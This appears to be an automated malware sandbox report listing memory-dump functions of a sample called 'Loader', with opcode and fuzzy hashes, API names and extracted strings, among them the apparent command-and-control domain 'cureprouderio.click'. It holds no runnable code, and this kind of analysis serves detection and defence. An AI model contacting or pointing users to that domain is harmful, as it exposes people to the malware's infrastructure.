                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KI
                                                                                                  • API String ID: 0-1977173829
                                                                                                  • Opcode ID: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
                                                                                                  • Instruction ID: 91a34f79fce4890eca5ccf24ac22c1236428951ee7d79aa7463c0d4d2c87feab
                                                                                                  • Opcode Fuzzy Hash: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
                                                                                                  • Instruction Fuzzy Hash: 9C41F43564C7908AD3358F34D8943EABBF1ABD6300F58866DD4C99B382CB7855069B86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: q
                                                                                                  • API String ID: 0-4110462503
                                                                                                  • Opcode ID: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
                                                                                                  • Instruction ID: 93a25755fb4b0333ef7b556c8c5401fcb28c9ec14eb27c0752a44160350e560f
                                                                                                  • Opcode Fuzzy Hash: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
                                                                                                  • Instruction Fuzzy Hash: AA41583464C340ABC7054B24DC06B6E7BA1AF97B05F04896EF5E18B2E1C7798815CB8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KI
                                                                                                  • API String ID: 0-1977173829
                                                                                                  • Opcode ID: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
                                                                                                  • Instruction ID: aae285d08021c98cc9ad7b5e59d58feaf1cef8b380b4a0bc2b22dfea0a95e3f8
                                                                                                  • Opcode Fuzzy Hash: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
                                                                                                  • Instruction Fuzzy Hash: CF411675A4C7908BD3258F34D8943EABBF1FBC5300F588A6DD4C99B385CB7854069B86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cureprouderio.click
                                                                                                  • API String ID: 0-2925096321
                                                                                                  • Opcode ID: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
                                                                                                  • Instruction ID: b8e46fd4180620e8fa4f02fa5b31e0b327415897175f02e2bb6ac1baa248a022
                                                                                                  • Opcode Fuzzy Hash: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
                                                                                                  • Instruction Fuzzy Hash: 011125346555019AE34DCB34C8E6B7AA363EF43304B64622DD113A32E5DB796816C61C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: v
                                                                                                  • API String ID: 0-1801730948
                                                                                                  • Opcode ID: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
                                                                                                  • Instruction ID: 9699c58770c97fb3a7005195816939a3fdc948d4c1fc9f16f5ad9316cf85a81d
                                                                                                  • Opcode Fuzzy Hash: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
                                                                                                  • Instruction Fuzzy Hash: EB11E276D187618BC310CF34C98028FBAE2ABC9315F16892DE4C5A3315D678CD48CB8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: lhin
                                                                                                  • API String ID: 0-138776974
                                                                                                  • Opcode ID: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
                                                                                                  • Instruction ID: 7fd97130cce7ea1aa8fbfb12d6e93ce7f630f2e99416a8fc191b46fa008a84d9
                                                                                                  • Opcode Fuzzy Hash: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
                                                                                                  • Instruction Fuzzy Hash: D0F0E236F742848BD708CFB9CC4226A66E3DB1A204B18D43DC456E3741E128E8014F18
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cureprouderio.click
                                                                                                  • API String ID: 0-2925096321
                                                                                                  • Opcode ID: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
                                                                                                  • Instruction ID: b0d56012c3d891d04b8b069242e406f0bf4132553d77d7a172f771eb767dd099
                                                                                                  • Opcode Fuzzy Hash: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
                                                                                                  • Instruction Fuzzy Hash: 1CF0A739A502158BCB04CF14C86277773B2EF8A312F046425D547EB392D3788C40C7A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: /lmb
                                                                                                  • API String ID: 0-3946268590
                                                                                                  • Opcode ID: b2d4435d6592d3df5b43c8a07f37ef4b00b2396ced98faf09dab045db6f26371
                                                                                                  • Instruction ID: a5e828aa6f98702fee6d9b5aa253f0e325b3382cd617644059fa6236e749b797
                                                                                                  • Opcode Fuzzy Hash: b2d4435d6592d3df5b43c8a07f37ef4b00b2396ced98faf09dab045db6f26371
                                                                                                  • Instruction Fuzzy Hash: C2F06579A449C58BDB54CF38ADB52B777F0E74B215F1029B8C602E36A0DA7098518A0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29ca138e8e61109462f19737de04b8d039f2d35e56ca922e3c7f9b6a441abc5a
                                                                                                  • Instruction ID: 6faf0af17566aac506bc1040dc481aed4187c46a203c2ba552b46565fbfeed05
                                                                                                  • Opcode Fuzzy Hash: 29ca138e8e61109462f19737de04b8d039f2d35e56ca922e3c7f9b6a441abc5a
                                                                                                  • Instruction Fuzzy Hash: 2922A272A087118BC725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8d53a1485c9af1d75df7a3ff55b9b87dfe617749fb47fde82fc328e9d4b398f8
                                                                                                  • Instruction ID: 9440bc60363055fc7741ad62e826ac52b0005078bc596843184142e62853e9a9
                                                                                                  • Opcode Fuzzy Hash: 8d53a1485c9af1d75df7a3ff55b9b87dfe617749fb47fde82fc328e9d4b398f8
                                                                                                  • Instruction Fuzzy Hash: 98022576A58211CFC708CF38D89056AB7E2FB8E310F0A857DD985D7361EA35AC15CB85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
                                                                                                  • Instruction ID: d1bd641e04ddd3f8c80cfe45303f140b1f3ce863c723953b48f0dca61e0ef25d
                                                                                                  • Opcode Fuzzy Hash: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
                                                                                                  • Instruction Fuzzy Hash: D9F1F0356087418FD724CF29C88162BFBE6EFD9304F48882EE4C987791E679E804CB56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d9cad568b11121c154bad12ef47db6900822e1f5151d61a13d7de090968f692f
                                                                                                  • Instruction ID: d7541f2fca1ccae41e83f46ef6531090e0b4554b2222c138a89db1d633840617
                                                                                                  • Opcode Fuzzy Hash: d9cad568b11121c154bad12ef47db6900822e1f5151d61a13d7de090968f692f
                                                                                                  • Instruction Fuzzy Hash: 52A17875A083408FD7158F38D8817BBBBE2EB9B318F09457ED4D997292D638C941CB1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1764b8be42eb86bb9f4620744e48ded1e75189da67836bc67bee5a72cb3ea6f3
                                                                                                  • Instruction ID: c9d4c165c56bfbf3c03a271f9fb192967cfd025fb11622c30a046a2f8b83f669
                                                                                                  • Opcode Fuzzy Hash: 1764b8be42eb86bb9f4620744e48ded1e75189da67836bc67bee5a72cb3ea6f3
                                                                                                  • Instruction Fuzzy Hash: 618106352443019BE7249F18D480A2FB7E2FFD9750F15846DEA859B391DB38DC61C78A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e28be7b75410f075c26fcddfdb7d548f0538016a9353fd7724876d478ba0bf56
                                                                                                  • Instruction ID: f9dc6b06319712505be0b00d1611807c54d1d8e9fe27d53802d70cc7455a1389
                                                                                                  • Opcode Fuzzy Hash: e28be7b75410f075c26fcddfdb7d548f0538016a9353fd7724876d478ba0bf56
                                                                                                  • Instruction Fuzzy Hash: 1E81A57460D3428FC719CF29C49062EBBE2AFC9314F18866EE4E587382D639D846CB56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9dd72832e23b2b70cc6ebba476d32fddb174955166605a8e5e5476f3b589601
                                                                                                  • Instruction ID: 74bc6ab1bbaf3b69a7a1375347432e2d302a30213048b9414b69be7e4a431046
                                                                                                  • Opcode Fuzzy Hash: f9dd72832e23b2b70cc6ebba476d32fddb174955166605a8e5e5476f3b589601
                                                                                                  • Instruction Fuzzy Hash: 5A415CB5A0D3A58BD3358B2898643B7BFD0DFA3304F28089EE8DA57351D779480587D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65cbdfa24d642580817c22312a4d4416be34adb8d03870b701ba4631b34f5032
                                                                                                  • Instruction ID: eed30cc65e9a7acdb6177f5dd8ded5a2b05ec64c6f0e7533b6fe5fd470de70e5
                                                                                                  • Opcode Fuzzy Hash: 65cbdfa24d642580817c22312a4d4416be34adb8d03870b701ba4631b34f5032
                                                                                                  • Instruction Fuzzy Hash: BE51F039254B01CFCB298F64DC95B1ABBB2FF4A311F04847DE55687A62C738E816CB15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 224b885b2d33e1646e8711822722071e2e6a455e5a6b5f8b883611f4457d948c
                                                                                                  • Instruction ID: 9e15d2c07ce86351c6ebb163d7bbc7b39beeeef97fa94347135c7c3a5bbe2237
                                                                                                  • Opcode Fuzzy Hash: 224b885b2d33e1646e8711822722071e2e6a455e5a6b5f8b883611f4457d948c
                                                                                                  • Instruction Fuzzy Hash: 7641C8356147018FC729CF68C991962BBE2FB8A314318D66EC5A6C7795C638E846CB48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 519c7b1d929cf06ac58c773f830ddbc472e0c9eb742fe59324e356552328b5b0
                                                                                                  • Instruction ID: 52f43bb69bf967e13d8b8cf2b488c67a51938e76d39e84f9618a723eb99c5912
                                                                                                  • Opcode Fuzzy Hash: 519c7b1d929cf06ac58c773f830ddbc472e0c9eb742fe59324e356552328b5b0
                                                                                                  • Instruction Fuzzy Hash: F94126B5908380DFE3309B259C417ABB7A6EB93308F18493DE895532A2DF359815CB5B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e4ff31274707ca65935b0076e1da50561794554b8f4a8f1593c33844884775f5
                                                                                                  • Instruction ID: 99084ae7948e4e969f5cab21ab752441f84075a4ec3b964ea1b353b24493650c
                                                                                                  • Opcode Fuzzy Hash: e4ff31274707ca65935b0076e1da50561794554b8f4a8f1593c33844884775f5
                                                                                                  • Instruction Fuzzy Hash: 7621B0705082418BD7258B28C8B17F777F0EF9B324F085A9DD8D68B392E7389845C71A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 643e9d03ab5afcafe616b615b53e5a37d48034b3075b442a74698f38aaaabc60
                                                                                                  • Instruction ID: ecce191509777419fe2065107418a7e373d2744f15f7fbda99c47c06ac08e1c0
                                                                                                  • Opcode Fuzzy Hash: 643e9d03ab5afcafe616b615b53e5a37d48034b3075b442a74698f38aaaabc60
                                                                                                  • Instruction Fuzzy Hash: 3B31EDB5D102428FDB04CF74EC525AABFB1FB1B314F48647EC481AB262D6399885CF98
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: c0606199e92ee5f98f37b4575949366b277766458398aec2d8c18da042f17e8e
                                                                                                  • Instruction ID: 7b77d76e57314b8d537e66dbda0905c5b71d9ff5251147711cb921c64f52ab4a
                                                                                                  • Opcode Fuzzy Hash: c0606199e92ee5f98f37b4575949366b277766458398aec2d8c18da042f17e8e
                                                                                                  • Instruction Fuzzy Hash: 70114C746493009BDB25AB1898D09777762EBD6328F15193ED09217262D334DCD3CB0E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 655e66a32f0ec6ef73855cb929e808cb87c538b78d40acdce1f821a373a6cf25
                                                                                                  • Instruction ID: 49c952b68e76756303a7cfa84cb587e570531a8abc643f2441ca8aaef1216cf7
                                                                                                  • Opcode Fuzzy Hash: 655e66a32f0ec6ef73855cb929e808cb87c538b78d40acdce1f821a373a6cf25
                                                                                                  • Instruction Fuzzy Hash: 1A1151386493408BD7299B2584D05BBB7A1EBDA338F25172EC096532A1C738DCD7CB0E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
                                                                                                  • Instruction ID: 61a3990d51287a321700371caea8ac95de16791a53993df06537a25f78a5eb73
                                                                                                  • Opcode Fuzzy Hash: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
                                                                                                  • Instruction Fuzzy Hash: 5C01D674A98740DBD3708B189581AEBB7B5FBCA324F545B2DD0C593250D634D892CB8E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                  • Instruction ID: 5939802b1301af77679c215306a21a7299ef6c9da27cc0b365f9f239b0c19f2f
                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                  • Instruction Fuzzy Hash: 6C110833B055D50EC3168D3C8400565BFA30AA7234F6D93DAF4B89B2D6D6278D8B8399
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
                                                                                                  • Instruction ID: a27733a69205e04c464837f65cce1e328396de0a29cbbd258d365049883dbe47
                                                                                                  • Opcode Fuzzy Hash: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
                                                                                                  • Instruction Fuzzy Hash: 7401B1F1B0031257DB20DF51A4C0727B2A9AF84708F4A453EE8485B382EB7DFC08C69A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
                                                                                                  • Instruction ID: 94a2685e38f00eaf1eb05f0091b19f393d3aa0123d7ed6f17fd2bfd551075456
                                                                                                  • Opcode Fuzzy Hash: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
                                                                                                  • Instruction Fuzzy Hash: 9911E0727493000BE704CE3AA89016BFBE3AFD3214F2E983DD182C7725D93588078B4A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
                                                                                                  • Instruction ID: fb47be4d804a9da23881eaf03f8acb819a2e87175e2b70562f1e2f5772406857
                                                                                                  • Opcode Fuzzy Hash: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
                                                                                                  • Instruction Fuzzy Hash: C30126B4664700DBEB248B259C51BB7B7A1E7CA334F541A2DE0C2A31A1C6249890CA1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
                                                                                                  • Instruction ID: 21743fce8f8fc89d95ce078a34e0e0e5e44fc2aba6199b741040941cf27e962f
                                                                                                  • Opcode Fuzzy Hash: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
                                                                                                  • Instruction Fuzzy Hash: 1CF0467B71821D0BD310DDA9FCC4577B3A6EBD5204B0A4139EA40A3381E8F4F80592A4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
                                                                                                  • Instruction ID: 467d839b1f2edd79695e981d77696c97d4829d5b404480f02d90e7557cfed571
                                                                                                  • Opcode Fuzzy Hash: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
                                                                                                  • Instruction Fuzzy Hash: AD1192B09007029FE3649F19C899712FAB4BB06324F50978CE0695E6D2C3BAD589CFD5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
                                                                                                  • Instruction ID: 01548a179f3559cfb04f008a038ad398e0644e2916ec8190e41f8619e0e1dcf3
                                                                                                  • Opcode Fuzzy Hash: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
                                                                                                  • Instruction Fuzzy Hash: FFE02BBAF480108B530CCF16D8505B073E2A3CB311704E03CD44AD7311C931DC12560D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
                                                                                                  • Instruction ID: 71cc694b795eba117cf9378a5a53a8597336b0837f4540bad7c117c05afde082
                                                                                                  • Opcode Fuzzy Hash: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
                                                                                                  • Instruction Fuzzy Hash: DDD05E359142049AC7008F2DA500919B7F0EBC7750F00A52DB448E72A9CB71C8019709
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
                                                                                                  • Instruction ID: d02d98b6c4407079e00ef93f935acfea29071d225d302e4f93154c128f20d5d8
                                                                                                  • Opcode Fuzzy Hash: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
                                                                                                  • Instruction Fuzzy Hash: FAB0127090C10087D504CF08C450470F378D747215F003418D00AB3102C310E800CA0C
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocString
                                                                                                  • String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
                                                                                                  • API String ID: 2525500382-871300800
                                                                                                  • Opcode ID: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
